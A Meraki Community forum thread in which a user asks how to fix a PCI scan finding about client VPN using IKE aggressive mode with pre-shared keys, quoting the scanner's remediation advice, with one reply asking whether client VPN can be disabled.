PCI Compliane and Client VPN

lpopejoy
A model citizen

PCI Compliane and Client VPN

How would you guys handle this with Meraki?

 

Here's the email from control scan:

 

The External scan detected ISAKMP with aggressive mode pre-shared

secret authentication.

The vulnerability is that the hash (pre shared key) is not encrypted!

Suggestions for remediation are as follows.

 

Solutions:

- Isolate the credit card subnet from the vpn subnet failing the scan.

(Please send a network diagram.)

- Disable Aggressive Mode and use Main Mode.

- Do not use Pre-Shared key for authentication if it's possible, use

strong certificates.

- If possible, do not allow VPN connections from all IP addresses,

restrict to an ACL(Access Control List).

- If using Pre-Shared key cannot be avoided, use very strong keys

along with multifactor authentication in accordance with PCI DSS 8.3.2

Please send a screenshot of your login or your configuration page to

your multifactor authentication tool/application to access the VPN,

i.e. (DUO, Symantec, Azure Authentication mgr, etc....).

 

PCI DSS 8.3.2

Please note that all Remote Access to the credit card subnet requires

Multifactor Authentication per PCI DSS 8.3.2

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

8.3.2

2 REPLIES 2
PhilipDAth
Kind of a big deal
Kind of a big deal

Are you using client VPN?  Is it possible to turn it off in your environment?

Get notified when there are additional replies to this discussion.
Welcome to the Meraki Community!
To start contributing, simply sign in with your Cisco account. If you don't yet have a Cisco account, you can sign up.
Labels